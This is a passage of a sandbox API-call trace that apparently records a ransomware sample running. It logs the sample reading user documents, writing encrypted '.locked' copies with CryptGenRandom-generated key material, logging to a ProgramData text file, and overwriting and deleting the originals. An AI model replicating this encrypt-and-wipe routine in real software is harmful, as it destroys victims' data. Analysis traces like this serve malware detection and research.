pbBuffer=0x1237c181) returned 1 [0305.817] WriteFile (in: hFile=0x230, lpBuffer=0x1264d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12669d78, lpOverlapped=0x0 | out: lpBuffer=0x1264d000*, lpNumberOfBytesWritten=0x12669d78*=0x80, lpOverlapped=0x0) returned 1 [0305.820] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0305.821] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0305.821] SetEvent (hEvent=0x150) returned 1 [0305.821] SetEvent (hEvent=0x1e8) returned 1 [0305.821] SetEvent (hEvent=0x214) returned 1 [0305.821] SetEvent (hEvent=0x184) returned 1 [0305.821] ReadFile (in: hFile=0x1b0, lpBuffer=0x1286a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesRead=0x12669d68*=0xe790, lpOverlapped=0x0) returned 1 [0305.825] WriteFile (in: hFile=0x230, lpBuffer=0x1286a000*, nNumberOfBytesToWrite=0xe790, lpNumberOfBytesWritten=0x12669d74, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesWritten=0x12669d74*=0xe790, lpOverlapped=0x0) returned 1 [0305.831] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.037] ReadFile (in: hFile=0x1b0, lpBuffer=0x1286a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12669d68, lpOverlapped=0x0 | out: lpBuffer=0x1286a000*, lpNumberOfBytesRead=0x12669d68*=0x0, lpOverlapped=0x0) returned 1 [0306.038] CloseHandle (hObject=0x230) returned 1 [0306.040] CloseHandle (hObject=0x1b0) returned 1 [0306.040] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0306.040] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12669e94 | out: lpMode=0x12669e94) returned 0 [0306.040] WriteFile (in: hFile=0x1b0, lpBuffer=0x125ec0a0*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x12669e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0a0*, lpNumberOfBytesWritten=0x12669e64*=0x4e, lpOverlapped=0x0) returned 1 [0306.040] CloseHandle (hObject=0x1b0) returned 1 [0306.041] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\eJiGd4u4uD5.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\ejigd4u4ud5.pps")) returned 1 [0306.055] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.066] SetEvent (hEvent=0x1e8) returned 1 [0306.066] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.067] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.236] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\7NGgJCF9p1sXP7bTM6Xc.odp" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\7nggjcf9p1sxp7btm6xc.odp")) returned 1 [0306.253] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.397] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.398] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.405] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.410] SetEvent (hEvent=0x20c) returned 1 [0306.410] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0306.467] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.467] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0306.469] SetEvent (hEvent=0x20c) returned 1 [0306.469] SetEvent (hEvent=0x1e8) returned 1 [0306.469] SetEvent (hEvent=0x214) returned 1 [0306.469] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.472] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0306.472] SetEvent (hEvent=0x20c) returned 1 [0306.472] SetEvent (hEvent=0x1e8) returned 1 [0306.472] SetEvent (hEvent=0x214) returned 1 [0306.472] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.473] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125d9e94 | out: lpMode=0x125d9e94) returned 0 [0306.473] WriteFile (in: hFile=0x1f4, lpBuffer=0x1264a100*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x125d9e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a100*, lpNumberOfBytesWritten=0x125d9e64*=0x3b, lpOverlapped=0x0) returned 1 [0306.473] CloseHandle (hObject=0x1f4) returned 1 [0306.474] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\Y75tBvZHinL.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\y75tbvzhinl.pptx")) returned 1 [0306.513] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\Y75tBvZHinL.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\y75tbvzhinl.pptx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0306.977] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x125d9e88 | out: lpMode=0x125d9e88) returned 0 [0306.977] SetEvent (hEvent=0x104) returned 1 [0306.977] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0306.989] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0306.990] SetEvent (hEvent=0x14c) returned 1 [0306.990] SetEvent (hEvent=0x1e8) returned 1 [0306.990] SetEvent (hEvent=0x1b8) returned 1 [0306.991] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0306.992] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0306.992] SetEvent (hEvent=0x150) returned 1 [0306.992] SetEvent (hEvent=0x1b8) returned 1 [0306.992] SetEvent (hEvent=0x1e8) returned 1 [0306.992] WriteFile (in: hFile=0x224, lpBuffer=0x152de000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1239fe78, lpOverlapped=0x0 | out: lpBuffer=0x152de000*, lpNumberOfBytesWritten=0x1239fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0307.019] CloseHandle (hObject=0x224) returned 1 [0307.072] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\Y75tBvZHinL.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\y75tbvzhinl.pptx")) returned 1 [0307.107] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.200] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.210] SetEvent (hEvent=0x22c) returned 1 [0307.211] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0307.301] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.301] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0307.304] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.304] SetEvent (hEvent=0x12c) returned 1 [0307.304] SetEvent (hEvent=0x214) returned 1 [0307.304] SetEvent (hEvent=0x22c) returned 1 [0307.304] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.305] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0307.305] SetEvent (hEvent=0x150) returned 1 [0307.305] SetEvent (hEvent=0x214) returned 1 [0307.305] SetEvent (hEvent=0x22c) returned 1 [0307.305] SetEvent (hEvent=0x12c) returned 1 [0307.305] SetEvent (hEvent=0x190) returned 1 [0307.305] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.333] SetEvent (hEvent=0x14c) returned 1 [0307.334] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0307.344] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.344] SetEvent (hEvent=0x12c) returned 1 [0307.344] SetEvent (hEvent=0x1e8) returned 1 [0307.344] SetEvent (hEvent=0x1dc) returned 1 [0307.344] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.362] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0307.362] SetEvent (hEvent=0x150) returned 1 [0307.362] SetEvent (hEvent=0x12c) returned 1 [0307.362] SetEvent (hEvent=0x1e8) returned 1 [0307.362] SetEvent (hEvent=0x1dc) returned 1 [0307.363] SetEvent (hEvent=0x1b8) returned 1 [0307.363] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.427] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12667a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12667a24*=0xb) returned 1 [0307.445] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\zN zufeMLK.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zn zufemlk.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0307.446] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0307.446] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\zN zufeMLK.xlsx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zn zufemlk.xlsx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0307.699] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.848] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12667d9c | out: lpMode=0x12667d9c) returned 0 [0307.848] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0307.848] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0307.848] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0307.848] WriteFile (in: hFile=0x230, lpBuffer=0x12572000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12667d78, lpOverlapped=0x0 | out: lpBuffer=0x12572000*, lpNumberOfBytesWritten=0x12667d78*=0x80, lpOverlapped=0x0) returned 1 [0307.851] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0307.854] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0307.854] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0307.854] SetEvent (hEvent=0x150) returned 1 [0307.854] SetEvent (hEvent=0x220) returned 1 [0307.854] SetEvent (hEvent=0x1d0) returned 1 [0307.854] SetEvent (hEvent=0x1dc) returned 1 [0307.854] ReadFile (in: hFile=0x1bc, lpBuffer=0x14316000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesRead=0x12667d68*=0x7cae, lpOverlapped=0x0) returned 1 [0307.857] WriteFile (in: hFile=0x230, lpBuffer=0x14316000*, nNumberOfBytesToWrite=0x7cae, lpNumberOfBytesWritten=0x12667d74, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesWritten=0x12667d74*=0x7cae, lpOverlapped=0x0) returned 1 [0307.861] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0308.357] ReadFile (in: hFile=0x1bc, lpBuffer=0x14316000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12667d68, lpOverlapped=0x0 | out: lpBuffer=0x14316000*, lpNumberOfBytesRead=0x12667d68*=0x0, lpOverlapped=0x0) returned 1 [0308.358] CloseHandle (hObject=0x230) returned 1 [0308.368] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0308.612] CloseHandle (hObject=0x1bc) returned 1 [0308.612] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0308.612] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12667e94 | out: lpMode=0x12667e94) returned 0 [0308.612] WriteFile (in: hFile=0x1bc, lpBuffer=0x12380200*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x12667e64, lpOverlapped=0x0 | out: lpBuffer=0x12380200*, lpNumberOfBytesWritten=0x12667e64*=0x35, lpOverlapped=0x0) returned 1 [0308.612] CloseHandle (hObject=0x1bc) returned 1 [0308.613] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\zN zufeMLK.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zn zufemlk.xlsx")) returned 1 [0309.361] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\zN zufeMLK.xlsx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\zn zufemlk.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0309.517] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.541] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12667e88 | out: lpMode=0x12667e88) returned 0 [0309.541] SwitchToThread () returned 1 [0309.542] SetEvent (hEvent=0x1e8) returned 1 [0309.542] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.542] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.554] SetEvent (hEvent=0x220) returned 1 [0309.554] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.560] SetEvent (hEvent=0x190) returned 1 [0309.560] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0309.615] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.615] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0309.618] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.619] SetEvent (hEvent=0x20c) returned 1 [0309.619] SetEvent (hEvent=0x104) returned 1 [0309.619] SetEvent (hEvent=0x190) returned 1 [0309.619] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.619] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0309.619] SetEvent (hEvent=0x190) returned 1 [0309.619] SetEvent (hEvent=0x104) returned 1 [0309.619] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\BoCtyz6FCZp97BdAlRa6.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\boctyz6fczp97bdalra6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0309.620] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0309.620] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\BoCtyz6FCZp97BdAlRa6.wav.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\boctyz6fczp97bdalra6.wav.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0309.621] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e5d9c | out: lpMode=0x125e5d9c) returned 0 [0309.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0309.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0309.621] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0309.621] WriteFile (in: hFile=0x19c, lpBuffer=0x1238f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e5d78, lpOverlapped=0x0 | out: lpBuffer=0x1238f000*, lpNumberOfBytesWritten=0x125e5d78*=0x80, lpOverlapped=0x0) returned 1 [0309.625] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x0 [0309.626] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb30, ulCount=0x10, ulNumEntriesRemoved=0x3356fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb30, ulNumEntriesRemoved=0x3356fb10) returned 0 [0309.626] SetEvent (hEvent=0x150) returned 1 [0309.626] SetEvent (hEvent=0x104) returned 1 [0309.627] SetEvent (hEvent=0x190) returned 1 [0309.627] ReadFile (in: hFile=0x230, lpBuffer=0x14fc2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x14fc2000*, lpNumberOfBytesRead=0x125e5d68*=0x58a7, lpOverlapped=0x0) returned 1 [0309.628] WriteFile (in: hFile=0x19c, lpBuffer=0x14fc2000*, nNumberOfBytesToWrite=0x58a7, lpNumberOfBytesWritten=0x125e5d74, lpOverlapped=0x0 | out: lpBuffer=0x14fc2000*, lpNumberOfBytesWritten=0x125e5d74*=0x58a7, lpOverlapped=0x0) returned 1 [0309.630] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0309.788] SetEvent (hEvent=0x220) returned 1 [0309.788] ReadFile (in: hFile=0x230, lpBuffer=0x14fc2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e5d68, lpOverlapped=0x0 | out: lpBuffer=0x14fc2000*, lpNumberOfBytesRead=0x125e5d68*=0x0, lpOverlapped=0x0) returned 1 [0309.827] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.013] CloseHandle (hObject=0x19c) returned 1 [0310.014] CloseHandle (hObject=0x230) returned 1 [0310.014] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0310.014] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x125e5e94 | out: lpMode=0x125e5e94) returned 0 [0310.014] WriteFile (in: hFile=0x230, lpBuffer=0x1264c140*, nNumberOfBytesToWrite=0x94, lpNumberOfBytesWritten=0x125e5e64, lpOverlapped=0x0 | out: lpBuffer=0x1264c140*, lpNumberOfBytesWritten=0x125e5e64*=0x94, lpOverlapped=0x0) returned 1 [0310.014] CloseHandle (hObject=0x230) returned 1 [0310.015] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\BoCtyz6FCZp97BdAlRa6.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\boctyz6fczp97bdalra6.wav")) returned 1 [0310.116] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.216] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Music\\Jbo1FZx\\KcRwHRb9GRYnTCwA\\Yjsf\\jvLuJscJOug\\ZvLJyDLOgo\\YibDx1iNotnzBWQf\\8GJ8o0z9Qy_3x90hPI8\\BoCtyz6FCZp97BdAlRa6.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\jbo1fzx\\kcrwhrb9gryntcwa\\yjsf\\jvlujscjoug\\zvljydlogo\\yibdx1inotnzbwqf\\8gj8o0z9qy_3x90hpi8\\boctyz6fczp97bdalra6.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0310.770] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.939] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125e5e88 | out: lpMode=0x125e5e88) returned 0 [0310.939] SetEvent (hEvent=0x214) returned 1 [0310.939] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.945] SetEvent (hEvent=0x190) returned 1 [0310.945] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.946] SetEvent (hEvent=0x14c) returned 1 [0310.946] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.957] SetEvent (hEvent=0x190) returned 1 [0310.957] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0310.972] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.972] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0x1) returned 0x102 [0310.988] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.989] SetEvent (hEvent=0x214) returned 1 [0310.989] SetEvent (hEvent=0x184) returned 1 [0310.989] SetEvent (hEvent=0x1f0) returned 1 [0310.989] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0310.989] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x3356fb34, ulCount=0x10, ulNumEntriesRemoved=0x3356fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x3356fb34, ulNumEntriesRemoved=0x3356fb14) returned 0 [0310.990] SetEvent (hEvent=0x150) returned 1 [0310.990] SetEvent (hEvent=0x1f0) returned 1 [0310.990] SetEvent (hEvent=0x184) returned 1 [0310.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0310.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392060 | out: pbBuffer=0x12392060) returned 1 [0310.990] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0310.990] WriteFile (in: hFile=0x1b0, lpBuffer=0x12742000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12742000*, lpNumberOfBytesWritten=0x1239fd78*=0x80, lpOverlapped=0x0) returned 1 [0310.995] ReadFile (in: hFile=0x180, lpBuffer=0x15882000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15882000*, lpNumberOfBytesRead=0x1239fd68*=0x880, lpOverlapped=0x0) returned 1 [0310.996] WriteFile (in: hFile=0x1b0, lpBuffer=0x12742000*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x1239fd78, lpOverlapped=0x0 | out: lpBuffer=0x12742000*, lpNumberOfBytesWritten=0x1239fd78*=0x880, lpOverlapped=0x0) returned 1 [0311.067] WaitForSingleObject (hHandle=0x1ac, dwMilliseconds=0xffffffff) returned 0x0 [0311.524] ReadFile (in: hFile=0x180, lpBuffer=0x15882000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239fd68, lpOverlapped=0x0 | out: lpBuffer=0x15882000*, lpNumberOfBytesRead=0x1239fd68*=0x0, lpOverlapped=0x0) returned 1 [0311.526] CloseHandle (hObject=0x1b0) returned 1 [0311.565] CloseHandle (hObject=0x180) returned 1 [0311.566] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0311.566] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1239fe94 | out: lpMode=0x1239fe94) returned 0 [0311.566] WriteFile (in: hFile=0x180, lpBuffer=0x125a6120*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x1239fe64, lpOverlapped=0x0 | out: lpBuffer=0x125a6120*, lpNumberOfBytesWritten=0x1239fe64*=0x90, lpOverlapped=0x0) returned 1 [0311.566] CloseHandle (hObject=0x180) returned 1 [0311.566] DeleteFileW 